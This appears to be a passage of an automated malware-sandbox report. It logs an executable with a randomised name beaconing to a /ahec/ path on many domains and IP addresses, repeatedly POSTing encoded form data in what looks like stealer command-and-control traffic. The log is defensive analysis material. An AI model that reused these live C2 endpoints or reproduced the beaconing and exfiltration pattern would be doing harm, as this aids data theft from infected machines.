Dec 2, 2023 18:49:33.039011955 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:32 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
Dec 2, 2023 18:49:33.039036036 CET | 1340 | IN
Dec 2, 2023 18:49:33.039268970 CET | 1340 | IN
Dec 2, 2023 18:49:33.039311886 CET | 1340 | IN
Dec 2, 2023 18:49:33.039324999 CET | 333 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49743 | 66.29.155.54 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:49:35.461086988 CET | 516 | OUT | GET /ahec/?Vjk=-N-tntX&KHcH=DTrGbTEHMG6Y4mKy1Dn1KlGSTxAaPAt5CR5S23I4xf5AWU1NMecScwq/Pr/mUgt4GFrPBjE4MJyXMuu59XRude7iecelPQFgCQ== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.nesmalt.info
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 2, 2023 18:49:35.737441063 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:35 GMT
                                                                          Server: Apache
                                                                          Content-Length: 5278
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-
Dec 2, 2023 18:49:35.737471104 CET | 1340 | IN
Dec 2, 2023 18:49:35.737485886 CET | 1340 | IN
Dec 2, 2023 18:49:35.737503052 CET | 1340 | IN
Dec 2, 2023 18:49:35.737517118 CET | 348 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 49744 | 34.117.26.57 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:49:41.854471922 CET | 785 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.611erhm.top
                                                                          Origin: http://www.611erhm.top
                                                                          Referer: http://www.611erhm.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=Za8RRTmDzEAZd+LBr6RWlszeBnb5qgv83Kw6y1Fkx4VlxY96pd4jErIOinTlc3bXuSanBHjjEX/J5CLj2suYLq/0Buf0WvG5KlWIcV3kvFNY2rP9MO+u0MFiXhMwAiiCOwaQmWxr9Zi95hf5z6WxhpnD3kRl1NdUvn+Mohg3MfYDz2zLKw==
Dec 2, 2023 18:49:42.141279936 CET | 387 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:41 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 49745 | 34.117.26.57 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:49:44.486354113 CET | 805 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.611erhm.top
                                                                          Origin: http://www.611erhm.top
                                                                          Referer: http://www.611erhm.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=Za8RRTmDzEAZdebBsZpWjMzfEnb5kwv43K86y0B0xKBlw4N6oZUjHrIOoHShEXabuSeZBHvjEXrJ5H3j2/WbL6/2dufyYPG5KlWIcVjKvEpY1YH9Ov/45sFhHRMwWSiGOwbgmV0O9ba95gv5iPq2qpnF70QT0NsYiXefiyNScL1ryjfYNB3IYcVoN00Lh86z1TLnhcI=
Dec 2, 2023 18:49:44.772815943 CET | 230 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:44 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
Dec 2, 2023 18:49:44.775960922 CET | 211 | IN
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 49746 | 34.117.26.57 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
Timestamp | Bytes transferred | Direction | Data
Dec 2, 2023 18:49:47.106955051 CET | 1818 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.611erhm.top
                                                                          Origin: http://www.611erhm.top
                                                                          Referer: http://www.611erhm.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:47.949619055 CET  387  IN  HTTP/1.1 405 Method Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:47 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                          28  192.168.2.5  49747  34.117.26.57  80  1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:49:49.732218027 CET  515  OUT  GET /ahec/?KHcH=UYUxSke5jkUMcYDKg5c5qeCNAmjygCX5uaIG43dC5thZqMprvLUeD5Feo3aTVHSupyfrGHzleQTbxGW3puedJJLbH8mycsz0Gg==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.611erhm.top
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:49:50.019200087 CET  1340  IN  HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:49:49 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 5208
                                                                          Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                          Vary: Accept-Encoding
                                                                          ETag: "65267254-1458"
                                                                          Cache-Control: no-cache
                                                                          Accept-Ranges: bytes
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.42.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){console.log("",t);var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?"+t;var o=document.getElementsByTagName("script")[0];o.parentNode.insertBefore(e,o)}function
                                                                          Dec 2, 2023 18:49:50.019222975 CET  1340  IN
                                                                          Data Ascii: baiduPush(t,e,o){window._hmt.push(["_trackEvent",t,e,o])}console.log("..."),window._hmt=window._hmt||[];const BUILD_ENV="quark",token="42296466acbd6a1e84224ab1433a06cc";loadBaiduHmt(token)</script><script>function send
                                                                          Dec 2, 2023 18:49:50.019234896 CET  1340  IN
                                                                          Data Ascii: (i)&&t.push("".concat(encodeURIComponent(i),"=").concat(encodeURIComponent(a[i])));var c=t.join("&").replace(/%20/g,"+"),s="".concat("https://track.uc.cn/collect","?").concat(c,"&").concat("uc_param_str=dsfrpfvedncpssntnwbipreimeutsv");(e()||r
                                                                          Dec 2, 2023 18:49:50.019247055 CET  1340  IN
                                                                          Data Ascii: ument.getElementsByTagName("head")[0],$script1=document.createElement("script");$script1.setAttribute("crossorigin","anonymous"),$script1.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/vconsole.min-3.3.0.js"),$head.insertBefore($sc
                                                                          Dec 2, 2023 18:49:50.019258976 CET  418  IN
                                                                          Data Ascii: ngshan-20230802080400.exe")'> </div></div><div class="footer" id="footer"><div></div><div class="no-ad"></div><div></div><div></div></


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                          29  192.168.2.5  49748  81.169.145.70  80  1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:49:55.481358051 CET  794  OUT  POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.fam-scharf.net
                                                                          Origin: http://www.fam-scharf.net
                                                                          Referer: http://www.fam-scharf.net/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=kF7Vn6OF0YXrUbbY9r1FXeH/Z7Mdx+3UaHQ7mi15oTak04I0otecBRSsuaLbRoThvTljS6HZYyDJTG5y7XRtFWVCSIe0EoJvbyDQj5LkP5Lrt6WBqDAZrwGzdauyrX77JMH0JNKUPMI7Z0mboh4VsE+w35Mi44lT5uvScu6o2TXzMuplNw==
                                                                          Dec 2, 2023 18:49:55.686580896 CET  428  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:55 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                          30  192.168.2.5  49749  81.169.145.70  80  1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:49:58.212608099 CET  814  OUT  POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.fam-scharf.net
                                                                          Origin: http://www.fam-scharf.net
                                                                          Referer: http://www.fam-scharf.net/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5PrhOk0Z40poycGRSsg6LaPYT/vTprS67ZYynJTExyu2RqEGVAHYe2KIJvbyDQj5eBP5TrtuqBqiAa3gG8aauy4H7/JMGbJMm+POg7Z2ObpzQWlE+2z5N33q5eif3cKML+ljjnAbF2KFRbtcKvhv/RRf+rhSvpstM=
                                                                          Dec 2, 2023 18:49:58.418216944 CET  428  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:49:58 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                          31  192.168.2.5  49750  81.169.145.70  80  1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:50:00.942697048 CET  1827  OUT  POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.fam-scharf.net
                                                                          Origin: http://www.fam-scharf.net
                                                                          Referer: http://www.fam-scharf.net/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:01.144784927 CET  428  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:01 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                          32  192.168.2.5  49751  81.169.145.70  80  1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:50:03.661873102 CET  518  OUT  GET /ahec/?Vjk=-N-tntX&KHcH=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUxaOpL3PpxqeQ== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.fam-scharf.net
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:03.863384008 CET  428  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:03 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          33 | 192.168.2.5 | 49752 | 85.159.66.93 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:09.670131922 CET | 794 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.magmadokum.com
                                                                          Origin: http://www.magmadokum.com
                                                                          Referer: http://www.magmadokum.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=NFtq1frL3yg1waCB9ailcod5Z22NPFDUNWTkQPMceBueY9nN/uLnYiC3nfFaEmdQV6eFUCaxfgdRpL/rcwsEBvoYjrOSPDDKhLwTE4plPVTY7ou8FKo/NR0xnCpKapPFygudsnUZC48EjevMXbcz3nEV/BRwNkcMP8+Z6o2dYF2yeR04Gg==
                                                                          Dec 2, 2023 18:50:09.967868090 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:09 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 19
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:14.8569239Z


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          34 | 192.168.2.5 | 49753 | 85.159.66.93 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:12.419315100 CET | 814 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.magmadokum.com
                                                                          Origin: http://www.magmadokum.com
                                                                          Referer: http://www.magmadokum.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZ0GeYfPN+vLndiC3s/FTJGdXV6CNUCWxfh9RpLPrfCEHH/oa3bOULDDKhLwTE7VPPVrY74e8KPc4Ax0wxSpKMpPByguFsiwjC6EEjffMXKc0+nEXgRQce3hfMsu0zZ/qYF7GbEYrBVp3uPwCUsO8SxXWxuC8mGg=
                                                                          Dec 2, 2023 18:50:12.704992056 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:12 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 18
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:14.8569239Z


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          35 | 192.168.2.5 | 49754 | 85.159.66.93 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:15.720549107 CET | 1827 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.magmadokum.com
                                                                          Origin: http://www.magmadokum.com
                                                                          Referer: http://www.magmadokum.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:16.005774021 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:15 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 19
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:20.8952429Z


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          36 | 192.168.2.5 | 49755 | 85.159.66.93 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:18.465579987 CET | 518 | OUT | GET /ahec/?KHcH=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvE3/6rCIhWfjw==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.magmadokum.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:18.691795111 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:18 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 19
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:23.5807063Z


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          37 | 192.168.2.5 | 49756 | 162.241.252.161 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:24.291728020 CET | 812 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.thecoloringbitch.com
                                                                          Origin: http://www.thecoloringbitch.com
                                                                          Referer: http://www.thecoloringbitch.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
